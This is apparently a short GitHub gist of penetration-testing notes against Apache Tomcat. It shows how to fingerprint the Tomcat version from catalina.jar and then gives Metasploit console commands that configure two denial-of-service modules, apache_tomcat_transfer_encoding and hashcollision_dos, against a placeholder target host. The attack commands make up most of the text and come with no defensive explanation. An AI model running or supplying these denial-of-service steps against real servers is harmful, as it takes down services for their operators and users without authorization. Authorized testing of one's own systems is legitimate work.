Skip to content

Instantly share code, notes, and snippets.

@ddouhine
Created December 16, 2014 15:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ddouhine/c02efb6f4d6f8a39f47e to your computer and use it in GitHub Desktop.
Save ddouhine/c02efb6f4d6f8a39f47e to your computer and use it in GitHub Desktop.
//tomcat version
get and unzip $TOMCAT_HOME/server/lib/catalina.jar
cat org/apache/catalina/util/ServerInfo.properties
cat META-INF/MANIFEST.MF
grep -ri version * | more
(...)
META-INF/MANIFEST.MF:Specification-Version: 6.0
META-INF/MANIFEST.MF:Implementation-Version: 6.0.35
//msf modules
use auxiliary/dos/http/apache_tomcat_transfer_encoding
set RHOST 1.1.1.1
set RLIMIT 2000
set RPORT 80
set SSL true
use auxiliary/dos/http/hashcollision_dos
set RHOST 1.1.1.1
set VHOST XXX
set TARGET Java
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment